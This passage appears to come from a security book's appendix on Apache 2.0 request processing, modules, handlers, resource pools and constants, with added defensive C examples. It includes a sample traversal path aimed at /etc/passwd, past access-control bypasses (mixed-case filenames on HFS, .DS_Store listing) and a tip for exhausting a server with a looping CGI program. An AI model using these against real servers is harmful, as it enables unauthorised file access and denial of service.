External Hooks: AP_DECLARE_HOOK(int, do_something, (some_func *r, int n)) 
Response: mod_headers, mod_cern_meta, mod_include, mod_cgi, mod_cgid, mod_expires, mod_asis, mod_actions, mod_isapi, mod_ext_filter, mod_suexec 
Logging: mod_log_config, mod_usertrack 


FIGURE D.1 The basic progression of a simple Apache transaction. 


URI Handling 


Apache Web Server first establishes if it can satisfy the request. To determine this, 
Apache examines and translates URIs. The functions and hooks that control this 
process live chiefly in apache-source/httpd-version/server/request.c. In Apache 
2.0.28, these run from line 94 to line 1708. 


They are as follows: 


• decl_die()—Returns an error if httpd finds the request malformed, or where the STATUS flag is DECLINED (lines 124-134). 

• ap_process_request_internal()—Sets forth httpd’s core request-handling logic (lines 141-282). 

• ap_getparents()—Filters /../ and /./ sequences to formulate a real path, if possible (line 154). 

• prep_walk_cache()—Checks the cache for recent cache entries. If none exist, it creates one (lines 308-339). 

• check_safe_file()—Filters requests for things that are not files, directories, or symbolic links. This protects the underlying system from malicious requests (lines 360-374). 

• ap_directory_walk()—Handles directory configuration information, checks FollowSymlinks and FollowSymOwner status, and checks for .htaccess files at the directory level (lines 449-1004). 

• ap_location_walk()—Checks for location matches (lines 1053-1199). 

• translate_name—Lets modules handle or translate the URI/filename, based on whether it’s an alias, residing in a vhost’s directory, and so on (line 165). 

• map_to_storage—If Apache gets the URI—and the URI is legal—this lets modules map it to something based on per-directory configurations then present (line 175). 

• ap_location_walk()—To exclude requests with no real URI, Apache runs the location walk again, to ensure an override to the map_to_storage configuration (lines 1053-1199). 

• header_parser—Apache parses the client’s headers (line 192). 

• access_checker—Checks user access information (line 214). 

• auth_checker—Checks user auth information (line 225). 

• type_checker—Lets modules set content type, language, character set and request handler (line 264). 

• ap_file_walk()—Checks for cache/file matches (lines 1201-1341). 

• make_sub_request()—Handles relative URI requests, such as Server Side Includes, map files, or other sub-request components (lines 1359-1368). 

• fill_in_sub_req_vars()—Starts a new configuration for a request to the specified vhost, copies the allowed methods list, and sets the appropriate output filters (lines 1370-1406). 

• ap_some_auth_required()—Checks for required arguments or line configuration for this request type. If so, and such arguments or line configurations are absent, httpd drops the request on error (lines 1425-1446). 

• ap_sub_req_method_uri()—Creates a new sub-request and sets up the r->main pointer (lines 1449-1484). 

• ap_sub_req_lookup_uri()—Calls ap_sub_req_method_uri with a GET request type (lines 1486-1491). 

• ap_sub_req_lookup_dirent()—Calls fill_in_sub_req_vars, creates a new request, stats files, resolves symbolic links, fills in parsed_uri values, and, if possible, satisfies the new request (lines 1493-1586). 

• ap_sub_req_lookup_file()—Handles canonical names and relative path requests (lines 1588-1677). 

• ap_destroy_sub_req()—Destroys the last processed sub-request (lines 1688-1692). 

• ap_update_mtime()—Sets the r->mtime field (lines 1698-1703). 

• ap_is_initial_req()—Differentiates sub-requests from internal redirects (lines 1708-1714). 


During such a transaction, a request might fall through to several URI-handling 
modules, which perform varied operations. 
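To make the /../ and /./ filtering concrete, here is a small path normaliser added for this appendix. It is not Apache’s ap_getparents(); the functions normalize_uri_path(), normalized_copy(), normalizes_to() and path_escapes_root() are hypothetical names, and the sample paths are constructed. Beyond the two sequences the text names, it also collapses doubled slashes and rejects any path that would climb above the root, the case a server must refuse before it maps a URI to storage.

```c
/* Added example (not Apache's code): collapse "/./" and "/../" segments
 * in an absolute URI path, and refuse paths that try to climb above "/". */
#include <stdio.h>
#include <string.h>

/* Normalise `path` in place. Returns 1 on success, 0 if the path is not
 * absolute, is too long, or would escape above the root (e.g. "/../x"). */
static int normalize_uri_path(char *path)
{
    char out[1024];
    size_t n = 0;                      /* bytes written into out */
    const char *p = path;

    if (*p != '/' || strlen(path) >= sizeof out)
        return 0;
    out[n++] = '/';
    p++;
    while (*p) {
        const char *seg = p;           /* next segment, up to '/' or end */
        size_t len = strcspn(p, "/");
        p += len;
        if (*p == '/') p++;            /* skip the separator */

        if (len == 0 || (len == 1 && seg[0] == '.'))
            continue;                  /* "//" or "/./": adds nothing */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (n == 1) return 0;      /* ".." at the root: reject */
            n--;                       /* back over the previous trailing '/' */
            while (n > 0 && out[n - 1] != '/') n--;
            continue;
        }
        memcpy(out + n, seg, len);
        n += len;
        out[n++] = '/';
    }
    /* every segment got a trailing '/'; keep it only if the input had one */
    if (n > 1 && path[strlen(path) - 1] != '/') n--;
    out[n] = '\0';
    memcpy(path, out, n + 1);
    return 1;
}

/* Normalise `src` into `dst`; 0 if rejected or dst cannot hold it. */
static int normalized_copy(const char *src, char *dst, size_t dstlen)
{
    if (strlen(src) >= dstlen) return 0;
    strcpy(dst, src);
    return normalize_uri_path(dst);
}

/* 1 if `src` normalises to exactly `expected` (handy for checks). */
static int normalizes_to(const char *src, const char *expected)
{
    char buf[1024];
    return normalized_copy(src, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

/* 1 if `src` is rejected because it would climb above the root. */
static int path_escapes_root(const char *src)
{
    char buf[1024];
    return !normalized_copy(src, buf, sizeof buf);
}

int main(void)
{
    /* constructed sample requests */
    const char *samples[] = { "/docs/./a/../index.html", "/a//b/", "/../etc/passwd" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char buf[1024];
        if (normalized_copy(samples[i], buf, sizeof buf))
            printf("%-26s -> %s\n", samples[i], buf);
        else
            printf("%-26s -> rejected (escapes root)\n", samples[i]);
    }
    return 0;
}
```

The rejection is deliberate rather than silently clamping at "/": a request that climbs above the root is malformed or hostile, and the walk that follows should never see it.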


URI-Handling Modules 

If you install the Apache distribution from the source, modules associated with URI 
handling will reside in apache-source/httpd-version/mappers and include the 
following: 


• mod_actions—Executes scripts on MIME types or HTTP methods 
• mod_alias—Maps different parts of the host filesystem in the document tree, and handles URL redirection 
• mod_dir—Handles default index files and trailing-slash (/) redirects 
• mod_imap—Handles image maps 
• mod_negotiation—Tracks what MIME types the client supports 
• mod_rewrite—Maps URIs to filenames using regular expressions 
• mod_so—Loads modules at runtime 
• mod_speling—Corrects simple spelling errors in URLs 
• mod_userdir—Maps user home directories 
• mod_vhost_alias—Provides support for dynamic virtual hosting 
User ID, Authentication, and Access 


A transaction’s second major phase is where Apache handles user ID, authentication, 
and access. (Is this user who she claims to be, and does she have authorized access to 
the specified resource?) During this phase, a request can fall through to several user 
ID, authentication, and access modules, which perform widely varied operations. 


User ID, Authentication, and Access Modules 
Modules associated with user access and authentication reside in apache-source/httpd-version/aaa and include the following: 


• mod_access—Provides access control based on client hostname or IP address. mod_access provides this access control through .htaccess files and within <Directory>, <Files>, and <Location> directive blocks. 

• mod_auth—Manages HTTP Basic authentication using plain text password and group files in the htpasswd system. With Basic authentication, Apache queries .htaccess files. These store your access rules and file locations. 

• mod_auth_anon—Provides anonymous user management and lets you specify if, how, and where anonymous users gain entry to password-protected directories. 

• mod_auth_db—Provides user authorization through Berkeley DB files. 

• mod_auth_dbm—Provides user authorization through DBM files. 

• mod_auth_digest—Provides authentication through use of message digest algorithms. Currently, above and beyond Basic type authentication, Apache supports digest-based cryptographic authentication using MD5. 


MIME-Type Determination 


If an object exists, if Apache can serve it, and if a user can access it, Apache must 
determine its MIME-type. For this, Apache uses several MIME-type related modules. 


MIME-Type Related Modules 
MIME-type modules handle content type decisions. They are as follows: 


• mod_mime—Determines document types using file extensions. Located in apache-source/httpd-version/mappers. 

• mod_mime_magic—Determines document types using magic numbers. Located in apache-source/httpd-version/metadata. 

• mod_negotiation—Handles content negotiation. Located in apache-source/httpd-version/mappers. 

• mod_charset_lite—An experimental module that sets the source character object set. You can use it to specify the character set source, default, and options. Located in apache-source/httpd-version/experimental. 


Response 


If an object exists, if Apache can serve it, if a user can access it, and after Apache 
determines its MIME-type, Apache must next format a response and associated 
headers. For this, it uses response header modules. 


Response Header Modules 
Response header modules handle HTTP headers. They are as follows: 


• mod_asis—Provides support to return files (with, for example, an .asis extension) without adding headers to them. That is, Apache sends such files as is, without appending headers—except for Date: and Server:, which it always sends. Located in apache-source/httpd-version/generators. 

• mod_cern_meta—Provides support for CERN httpd metafile semantics. Located in apache-source/httpd-version/metadata. 

• mod_expires—Applies Expires headers to resources. Located in apache-source/httpd-version/metadata. 

• mod_headers—Adds arbitrary HTTP headers to resources. Located in apache-source/httpd-version/metadata. 


Dynamic Content Handling 


Not every resource is static. Apache must build some resources from dynamic 
content. To do so, it uses dynamic content-handling modules. 


Dynamic Content Modules 
Dynamic content modules handle specialized, dynamic responses, such as Common 
Gateway Interface or ISAPI transactions. They are as follows: 


• mod_actions—Provides support for executing CGI scripts based on media type or request method. Located in apache-source/httpd-version/mappers. 

• mod_cgi—Provides support for invoking CGI scripts. Located in apache-source/httpd-version/generators. 

• mod_cgid—Provides support for invoking CGI scripts using an external daemon. Located in apache-source/httpd-version/generators. 

• mod_ext_filter—Provides support for filtering content with external programs. Located in apache-source/httpd-version/experimental. 

• mod_include—Provides support for server-parsed documents (SSI). Located in apache-source/httpd-version/filters. 

• mod_isapi—Provides Windows ISAPI Extension support. Located in apache-source/httpd-version/arch/win32. 

• mod_suexec—Provides support for running CGI requests as a specified user and group. Located in apache-source/httpd-version/generators. 


The Logging Phase 


Finally, when Apache performs a transaction, it must log that transaction to 
file. To do so, it deploys two logging modules. 


Logging Modules 
Logging modules handle Apache’s logging facilities. They are as follows: 


• mod_log_config—User-configurable logging replacement for mod_log_common. Located in apache-source/httpd-version/loggers. 

• mod_usertrack—Offers user tracking with cookies. Located in apache-source/httpd-version/loggers. 


Configuration 


Beyond the simplicity of the eight-phase process I earlier described, Apache’s 
complexity significantly increases. This is partly because Apache’s development 
model is modular. (Apache folks exported many functions to modules that NCSA, for 
example, concentrated in the server.) Moreover, Apache grants you wide latitude to 
exert granular control through a per-directory configuration system. This means that 
you can apply one rule set to one directory and another rule set to another directory. 


To understand this, please see the example in Figure D.2. 


NOTE 


You’ll find references to ap_directory_walk() in the files apache-source/httpd-version/include/http_request.h, apache-source/httpd-version/server/code.c, and apache-source/httpd-version/server/request.c. 
FIGURE D.2 Per-directory rules illustrated. 


As depicted in Figure D.2, we have a directory structure below DocumentRoot. Here, 
subdirectories have different access rules: 


• root grants access to larry, moe, and curly. 
• /home/httpd/html/modules grants access to larry and moe. 
• /home/httpd/html/modules/mod_auth_db grants access to moe only. 


To handle this situation, Apache—almost immediately upon receiving a request— 
launches ap_directory_walk() to look for per-directory rule sets residing in 
.htaccess files. This is complicated, because Apache’s base configuration file may 
often contain access control rule sets, too. Hence, Apache must combine the two— 
global and per-directory rule sets—and from this combination, determine if a user 
has sufficient access privileges. This combination is called merging and happens at a 
modular level. 


From this, you’d conclude that modules lacking merging functions force Apache to 
resort to httpd’s default access rules. However, unless developers make other provi- 
sions or you do explicitly, Apache uses the targeted directory’s access rules and 
ignores the parent’s rules. 
Apache’s development team took precautions to prevent security issues from arising 
around this. However, issues occasionally arise anyway. Good examples are the problems 
inherent in some Apache Mac OS X distributions. These issues—which enable 
remote attackers to traverse or otherwise view access control-protected directories— 
stem from several sources. 


In one case, it was merely an operating system-based problem. Mac OS X supports 
Hierarchical File System (HFS). HFS by itself does not apply case-sensitive rules to 
filenames and directories. Because of this, remote attackers could bypass Apache’s access 
control rules by requesting files with varied upper and lowercase characters. For 
example, if a protected file were named index.html, attackers could bypass its access 
restrictions by requesting InDeX.HtMl. To address this issue, Apple released mod_hfs, 
which now enforces pseudo case-sensitivity. 
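Both the rule merging described under Figure D.2 and the HFS case-folding problem can be seen in one small model, added here as an example rather than taken from Apache. The struct dir_rule table, access_allowed() and the fs_case_insensitive flag are invented; the three directories and the users larry, moe and curly are the Figure D.2 scenario. The walk picks the deepest rule that contains the requested file, so a child directory’s rule set replaces the parent’s, as the text says. With fs_case_insensitive set, the path is folded to lower case before matching, which is what a server on a case-insensitive filesystem must do so that a request spelled MODULES/ cannot dodge a rule written for modules/.

```c
/* Added example (not Apache's ap_directory_walk()): a per-directory
 * allow-list walk for the Figure D.2 scenario, plus the case-folding a
 * server needs on a case-insensitive filesystem such as HFS. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_USERS 4

struct dir_rule {
    const char *dir;                 /* directory the rule protects */
    const char *allow[MAX_USERS];    /* NULL-terminated list of users granted access */
};

/* constructed rule set matching Figure D.2 */
static const struct dir_rule rules[] = {
    { "/home/httpd/html",                     { "larry", "moe", "curly", NULL } },
    { "/home/httpd/html/modules",             { "larry", "moe", NULL } },
    { "/home/httpd/html/modules/mod_auth_db", { "moe", NULL } },
};

static void fold_case(char *s)
{
    for (; *s; s++) *s = (char)tolower((unsigned char)*s);
}

/* 1 if `dir` is `path` itself or an ancestor directory of it */
static int dir_contains(const char *dir, const char *path)
{
    size_t n = strlen(dir);
    return strncmp(dir, path, n) == 0 && (path[n] == '/' || path[n] == '\0');
}

/* Walk the rules: the deepest directory containing `filename` wins (the
 * child's rule set replaces the parent's), then check `user` against it.
 * Returns 1 = allowed, 0 = denied. If fs_case_insensitive is set, the
 * path is folded to lower case first, mirroring how such a filesystem
 * will resolve the name. */
static int access_allowed(const char *filename, const char *user, int fs_case_insensitive)
{
    char path[256];
    const struct dir_rule *best = NULL;
    size_t best_len = 0;

    if (strlen(filename) >= sizeof path) return 0;
    strcpy(path, filename);
    if (fs_case_insensitive) fold_case(path);

    for (size_t i = 0; i < sizeof rules / sizeof rules[0]; i++) {
        size_t n = strlen(rules[i].dir);
        if (dir_contains(rules[i].dir, path) && n >= best_len) {
            best = &rules[i];
            best_len = n;
        }
    }
    if (!best) return 0;             /* outside every ruled directory: deny */
    for (int j = 0; best->allow[j]; j++)
        if (strcmp(best->allow[j], user) == 0) return 1;
    return 0;
}

int main(void)
{
    const char *users[] = { "larry", "moe", "curly" };
    const char *files[] = {
        "/home/httpd/html/index.html",
        "/home/httpd/html/modules/list.html",
        "/home/httpd/html/modules/mod_auth_db/notes.html",
        "/home/httpd/html/MODULES/mod_auth_db/notes.html",   /* the HFS spelling trick */
    };
    for (size_t f = 0; f < sizeof files / sizeof files[0]; f++)
        for (size_t u = 0; u < 3; u++)
            printf("%-50s %-6s exact:%d folded:%d\n", files[f], users[u],
                   access_allowed(files[f], users[u], 0),
                   access_allowed(files[f], users[u], 1));
    return 0;
}
```

The last sample file is the interesting one: compared exactly, the mixed-case spelling matches only the root rule, so larry gets in; folded, it matches the mod_auth_db rule and only moe does. The rule set is the same in both runs; only the canonicalisation differs.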


Independent researcher Jacques Distler brought another hole of this variety to light— 
but from a different angle—on September 10, 2001. Distler determined that when 
attackers used the Mac OS X client and requested a URL from affected systems, if the 
request included a specification of a .DS_Store file, Apache revealed the directory’s 
contents. To address this, Distler recommended using the <FilesMatch> directive to 
shut out access. <FilesMatch> enables you to specify what Apache does when a 
client requests the specified file type. <FilesMatch> uses basic regular expression 
pattern matching. For example, to disallow access to GIF or JPEG files: 
<FilesMatch "\.(gif|jpe?g)$">. 


NOTE 





See “More Security Problems in Apache on Mac OS X,” located at 
http://www.macintouch.com/mosxreaderreports46.html to learn more about the 
.DS_Store vulnerability. 





These examples demonstrate how even Apache’s best efforts sometimes fail, and 
often Apache isn’t responsible. Rather, underlying issues with operating systems, third- 
party modules, and utilities can undermine Apache’s otherwise tight security 
controls. 


Consider these issues—especially global and local access control configuration rules— 
when authoring new modules or utilities that collaborate with Apache. Nothing will 
make folks swear off your new module or tool faster than when they discover that it 
enables remote attackers to escape the Web tree into the general population. 


Has this ever happened? You bet. In August 2001, Ben Ford showed that 
PHPMyExplorer Classic [1.0, 1.1.0, 1.1.1, 1.1.3, 1.1.4, 1.1.5, and 1.2], a front end, 
browser-based Web manager, let attackers break out of DocumentRoot and browse the 
greater file system at will. This was a disaster and offered experienced attackers root 
access. 


NOTE 


To learn more about the attack Ford described, go to 
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3266. 





Handlers 


Apache handlers indicate what Apache will do when a client requests a specified 
resource. That is, handlers provide httpd with a way to store file extension or data 
associations. 


You’ve likely seen handlers loaded into httpd.conf, for even in a default install, 
Apache sets handlers using the AddHandler directive. 


For example: 


AddHandler cgi-script .cgi 
AddHandler server-parsed .shtml 
AddHandler send-as-is asis 
AddHandler imap-file map 
AddHandler type-map var 


AddHandler’s syntax demands a handler name and a handler extension—in this case, 
a file extension. Though it operates at a more discrete level, this vaguely resembles 
how you create file associations in Windows. File associations tell Windows which 
application to use when opening or executing a file that carries a specific extension 
(for example, opening *.txt files with notepad.exe). But that’s where the 
similarities end. 


Handler specifications tell Apache what handler to use for the given file extension. 
For example, consider this line: 


AddHandler cgi-script .cgi 


This line tells Apache that files with the *.cgi extension contain Common Gateway 
Interface program or machine code. This places Apache on notice to send such 
requests through mod_cgi. Apache does not concern itself at this stage with the file’s 
language. It could be 


• A compiled C program 
• Perl source code 
• Python source code 
• Shell source code 


Indeed, at this particular stage, Apache doesn’t care what the file’s contents are. The 
important thing is merely that it has a *.cgi file extension and is therefore a CGI 
script or program. 


Traditional Apache default handlers are as follows: 


• cgi-script—Files with the specified extension are CGI programs, and Apache therefore invokes mod_cgi. 

• default-handler—This calls for the default_handler(), which handles static content. 

• imap-file—Files with the specified extension are imagemap rule files, and Apache therefore invokes imap_file. 

• send-as-is—Apache should send files with the specified extension without writing headers (except for Date: and Server:) and invoke mod_asis. 

• server-info—Gets the server’s configuration information, which mod_info handles. 

• server-parsed—Files with the specified extension contain not merely HTML, but also Server-Side Includes (SSI), so Apache should invoke mod_include. 

• server-status—Gets the server’s status report, which mod_status handles. 

• type-map—Apache should parse files with the specified extension as type-map files and invoke mod_negotiation. 


Handlers, after performing their assigned tasks, return an int that reports the trans- 
action’s status. This can be one of three things: 


• An Apache error code—This kills any further processing of the current request. In this instance, something went terribly awry. 

• DECLINED—No error arose, but for some other reason the module refuses this phase. Apache tries to find another phase, and if so, it uses that. Otherwise, if no other contingency arises, it applies its own handlers and continues. 

• OK—The handler performed its assigned task successfully. This doesn’t necessarily wrap up the transaction (or end the phase), but merely reports that this particular handler is done. 
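The three outcomes above, as a miniature dispatch loop added for illustration (not Apache’s code; the request struct, the AddHandler-style extension map, the status values and the handler names are all invented here): an error code stops the loop and becomes the request’s status, DECLINED passes the request to the next handler in line, and OK names the handler that finished the job.

```c
/* Added example (not Apache's code): an AddHandler-style extension map
 * and a handler chain that honours the OK / DECLINED / error contract. */
#include <stdio.h>
#include <string.h>

#define OK              0
#define DECLINED        (-1)
#define HTTP_NOT_FOUND  404

struct request {
    const char *uri;
    const char *handler;    /* handler name chosen from the extension map */
    int status;             /* final result of dispatch */
};
typedef int (*handler_fn)(struct request *r);

/* constructed equivalent of a few AddHandler lines from httpd.conf */
static const struct { const char *ext; const char *name; } add_handler[] = {
    { ".cgi",   "cgi-script"    },
    { ".shtml", "server-parsed" },
    { ".asis",  "send-as-is"    },
};

/* Map the file extension to a handler name; anything unmapped is static. */
static void assign_handler(struct request *r)
{
    const char *dot = strrchr(r->uri, '.');
    r->handler = "default-handler";
    if (!dot) return;
    for (size_t i = 0; i < sizeof add_handler / sizeof add_handler[0]; i++)
        if (strcmp(dot, add_handler[i].ext) == 0) r->handler = add_handler[i].name;
}

/* Sample handlers: each declines anything that is not its own business. */
static int cgi_handler(struct request *r)
{
    if (strcmp(r->handler, "cgi-script") != 0) return DECLINED;
    /* constructed failure: one script is missing, so the handler errors out */
    return strcmp(r->uri, "/cgi-bin/missing.cgi") == 0 ? HTTP_NOT_FOUND : OK;
}
static int include_handler(struct request *r)
{
    return strcmp(r->handler, "server-parsed") == 0 ? OK : DECLINED;
}
static int default_handler(struct request *r)
{
    (void)r;
    return OK;              /* static content: always serves */
}

/* Run the chain in order. DECLINED moves on; any other value ends the
 * request with that status. Returns the module that served it, or NULL. */
static const char *dispatch(struct request *r)
{
    static const struct { const char *name; handler_fn fn; } chain[] = {
        { "mod_cgi",     cgi_handler     },
        { "mod_include", include_handler },
        { "core",        default_handler },
    };
    assign_handler(r);
    for (size_t i = 0; i < sizeof chain / sizeof chain[0]; i++) {
        int rc = chain[i].fn(r);
        if (rc == DECLINED) continue;
        r->status = rc;
        return rc == OK ? chain[i].name : NULL;
    }
    r->status = DECLINED;   /* nobody claimed it */
    return NULL;
}

/* Convenience wrappers: which module served `uri` ("" if none), and its status. */
static const char *served_by(const char *uri)
{
    struct request r = { uri, NULL, 0 };
    const char *who = dispatch(&r);
    return who ? who : "";
}
static int status_for(const char *uri)
{
    struct request r = { uri, NULL, 0 };
    dispatch(&r);
    return r.status;
}

int main(void)
{
    const char *uris[] = { "/cgi-bin/search.cgi", "/index.shtml", "/index.html", "/cgi-bin/missing.cgi" };
    for (size_t i = 0; i < sizeof uris / sizeof uris[0]; i++)
        printf("%-22s served by %-12s status %d\n", uris[i], served_by(uris[i]), status_for(uris[i]));
    return 0;
}
```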


So, we’ve looked at handlers from the outside in, examining their functions and how 
you attach or set them. We’ve also covered several traditional handlers. Now, we'll 
take a closer look at handlers and how they perform their duties. 
Handlers in Action 


Apache invokes a handler with a single argument: the request object. Request objects 
encapsulate vital data about requests, including the following: 


• Bytes sent 
• Content type 
• Encoding 
• Filename 
• Method 
• Path 
• Protocol to use 
• Request description 
• Status 
• URI 


Apache handlers are capable of filling in these fields as needed, if Apache or a previ- 
ous handler or function didn’t. Or, yet another contingency is this: Perhaps the 
handler acquires every needed field, but cannot find or return the requested object. 
In that case, the handler returns a standard HTTP error code (404, perhaps), and 
Apache completes the transaction by constructing and returning an error result (for 
example, File Not Found). 


NOTE 


In most cases, Apache passes the request object with fields already populated. Exceptions are 
when dealing with image maps or CGI scripts, both of which might demand resources not 
included in the client’s original request. Here, Apache launches an internal redirect and a new 
request_rec for the server-side resources called within these objects. 





Resource Allocation 


Server applications like httpd are challenging to write, especially from a resource 
allocation viewpoint. To appreciate this, contrast such servers against word processing 
applications. 


Today, when you author a word processor application, you have your choice of a 
single or multi-document interface (MDI). Single document interfaces open one 
word processing window per program instance. MDI-based word processors can open 
several documents in the same program instance. 


However, even if you open ten documents via MDI, your word processor will likely 
eat only meager memory resources. That is, you face only a slim chance that your 
word processor will eat all the system memory. This is because word processors are 
single-user applications, and most PCs today sport ample memory and swap file 
space. 


Network servers work differently. Many users can access network servers 
simultaneously. In fact, you have no way to anticipate how many users will access your 
network application in any given week, day, hour, minute, or second. This raises 
resource allocation concerns. 


For each instance of a network server—or for each time a network server forks—the 
system must render resources. You, as a developer, must account for this in-program 
and limit to every degree possible the resources a typical transaction consumes. 


Certain types of network servers don’t raise overwhelming resource allocation 
concerns. For example, consider a network server that returns the system time. The 
utility date eats sparse memory and exits almost instantaneously. Thus, the exchange 
will eat nominal system resources. But Apache doesn’t return merely the time. 


Indeed, Apache—depending on what modules you load—can do all sorts of things, 
including open files, query databases, parse XML, spawn processes, draw graphs, and 
so on. Each such action devours resources—perhaps substantial resources. Add to this 
the fact that 500 users could be accessing your Web site at any given moment, and 
suddenly resources become a tremendous concern. 





If you want to see how fast your Web server can eat 100% system resources, write a CGI 
program that opens a file, traverses each line, and for each such line, performs some 
operation. Do this with a while() counter, but don’t increment your counter. This will throw the CGI 
into an infinite loop and hang Apache. At around 40 seconds, most average Web boxes will 
grind to a crawl. At two minutes, they become totally unresponsive. 


The Apache development team carefully considered resource allocation and settled 
on a system called the resource pool. The resource pool works like this: Apache assigns 
each request a resource pool, or a data structure that records and temporarily 
warehouses data on the associated request. This data structure persists throughout the life 
of the specified request. 


When Apache satisfies the request (or otherwise disposes of it), Apache clears that 
request’s associated resource pool and in the process, closes or releases all resources it 
allocated during the processing of that request. This is called clean up. 
Apache’s resource pool clean up is quite thorough and kills, closes, or otherwise 
releases 


• Child processes 
• Open external processes 
• Open files 
• Pipes 
• Sub-pools 
• Sub-requests 


Apache pools are 

• permanent_pool—The parent of all memory pools 
• pconf—Handles all configuration-time routines 
• pchild—Created during and for the child process, and handles the same 
• r->pool—For top-level or main requests 


Learn more about these pools in Chapter 18, “Hacking Homegrown Apache 
Modules.” 
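A toy pool with cleanups and sub-pools, added here to show the clean up described above. It is not APR’s pool code, and every name in it (pool_create(), pool_register_cleanup(), pool_clear(), simulate_request() and the rest) is invented for the example. Cleanups run in reverse registration order, a pool’s sub-pools are cleared before its own cleanups, and simulate_request() returns how many constructed “handles” remain open after the request pool is destroyed, which is zero when clean up did its job.

```c
/* Added example (not APR's pool code): a request pool whose destruction
 * releases everything registered with it, sub-pools first, newest first. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef void (*cleanup_fn)(const void *data);

struct cleanup { cleanup_fn fn; const void *data; struct cleanup *next; };

struct pool {
    struct cleanup *cleanups;   /* LIFO list of things to release */
    struct pool *sub_pools;     /* children, cleared before this pool's cleanups */
    struct pool *sibling;       /* next child of the same parent */
};

static struct pool *pool_create(struct pool *parent)
{
    struct pool *p = calloc(1, sizeof *p);
    if (!p) return NULL;
    if (parent) { p->sibling = parent->sub_pools; parent->sub_pools = p; }
    return p;
}

static int pool_register_cleanup(struct pool *p, cleanup_fn fn, const void *data)
{
    struct cleanup *c = malloc(sizeof *c);
    if (!c) return -1;
    c->fn = fn; c->data = data; c->next = p->cleanups; p->cleanups = c;
    return 0;
}

/* Run every cleanup (sub-pools first), leaving the pool empty but reusable. */
static void pool_clear(struct pool *p)
{
    while (p->sub_pools) {
        struct pool *child = p->sub_pools;
        p->sub_pools = child->sibling;
        pool_clear(child);
        free(child);
    }
    while (p->cleanups) {
        struct cleanup *c = p->cleanups;
        p->cleanups = c->next;
        c->fn(c->data);
        free(c);
    }
}

static void pool_destroy(struct pool *p) { pool_clear(p); free(p); }

/* --- demonstration: labelled "handles" stand in for files, pipes, children --- */
static int  open_handles;           /* how many handles are live right now */
static char cleanup_log[16];        /* order in which handles were released */

static void release_handle(const void *data)
{
    size_t n = strlen(cleanup_log);
    if (n + 1 < sizeof cleanup_log) { cleanup_log[n] = *(const char *)data; cleanup_log[n + 1] = '\0'; }
    open_handles--;
}

static void acquire(struct pool *p, const char *label)
{
    open_handles++;
    pool_register_cleanup(p, release_handle, label);
}

/* One request: three handles in the request pool, two in a sub-request
 * pool, then the request is disposed of. Returns handles still open. */
static int simulate_request(void)
{
    cleanup_log[0] = '\0';
    open_handles = 0;
    struct pool *rpool  = pool_create(NULL);     /* like r->pool */
    struct pool *subreq = pool_create(rpool);    /* like a sub-request's pool */
    acquire(rpool, "a"); acquire(rpool, "b"); acquire(rpool, "c");
    acquire(subreq, "x"); acquire(subreq, "y");
    pool_destroy(rpool);                         /* request done: everything goes */
    return open_handles;
}

static const char *cleanup_order(void) { return cleanup_log; }

int main(void)
{
    int left = simulate_request();
    printf("handles left open: %d, release order: %s\n", left, cleanup_order());
    return 0;
}
```

The release order shows the two properties that matter for a server: the sub-request’s handles (y, x) go before the request’s own (c, b, a), and nothing needs to remember individually what it opened, because disposing of the request pool releases all of it.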


Apache API Constants 


Table D.1 identifies some important Apache constants not well-documented in other 
titles. 


TABLE D.1 Apache API Constants 

Constant                     Description 
ACCESS_CONF                  Access control restrictions inside <Directory> or <Location> directives. 
APLOG_ALERT                  Logging alert messages (ap_log_rerror). 
APLOG_CRIT                   Logging critical messages (ap_log_rerror). 
APLOG_DEBUG                  Logging debug messages (ap_log_rerror). 
APLOG_EMERG                  Logging emergency messages (ap_log_rerror). 
APLOG_ERR                    Logging error messages (ap_log_rerror). 
APLOG_INFO                   Logging informational messages (ap_log_rerror). 
APLOG_LEVELMASK              Logging messages that exceed minimum level (ap_log_rerror). 
APLOG_MARK                   Logging (ap_log_rerror). 
APLOG_NOERRNO                Logging (ap_log_rerror). 
APLOG_NOTICE                 Logging notice messages (ap_log_rerror). 
APLOG_WARNING                Logging warning messages (ap_log_rerror). 
APLOG_WIN32ERROR             Logging WIN32 error messages (ap_log_rerror). 
BIG_SECURITY_HOLE            Compile-time directive that enables Apache to run as root even after it starts. Not a good idea. 
BO_BYTECT                    Options to bset/getopt. 
B_ASCII2EBCDIC               For translating ASCII encoded strings to their equivalent EBCDIC representations (binary safe). 
B_CHUNK                      If B_CHUNK is set, then routines using end_chunk() must be sure to call start_chunk() or set an error condition before they return to the caller. (Buffer setup.) 
B_EBCDIC2ASCII               For translating EBCDIC representations to their ASCII equivalents. 
B_EOF                        Buffer end-of-file. 
B_ERROR                      Expanded error field (buf). 
cmd_how                      Values designating how a given request_rec processes arguments. 
DEFAULT_ADMIN                Sets the default admin directory. Compile-time definition, and you can change it like this: env CFLAGS="-Wall -DDEFAULT_ADMIN=\"/usr/httpd/htdocs\"" ./configure. 
DEFAULT_CONTENT_TYPE         Sets the default content type. You can set this at compile time like this: env CFLAGS="-Wall -DDEFAULT_CONTENT_TYPE=\"application/octet-stream\"" ./configure. 
DEFAULT_HTTPS_PORT           This stores the port on which https will start, and it’s typically port 443. 
DEFAULT_HTTP_PORT            This stores the port on which Apache will start, and it’s typically port 80. 
DEFAULT_INDEX                If no DefaultIndex is defined, Apache uses this instead. Compile with env CFLAGS="-Wall -DDEFAULT_INDEX=\"default.html\"" ./configure. 
DEFAULT_KEEPALIVE            Specifies the default KEEPALIVE timeout value. This is a compile-time option, and you set it like this: env CFLAGS="-Wall -DDEFAULT_KEEPALIVE=20" ./configure. 
DEFAULT_KEEPALIVE_TIMEOUT    Specifies the default KEEPALIVE timeout value. This is a compile-time option, and you set it like this: env CFLAGS="-Wall -DDEFAULT_KEEPALIVE_TIMEOUT=20" ./configure. 
DEFAULT_PATH                 Compile-time definition that sets the default PATH. You set it like this: env CFLAGS="-Wall -DDEFAULT_PATH=\"/usr/local/bin:/bin:/usr/bin\"" ./configure. 
DEFAULT_TIMEOUT              A compile-time definition of the default timeout (in seconds). You set it like this: env CFLAGS="-Wall -DDEFAULT_TIMEOUT=600" ./configure. 
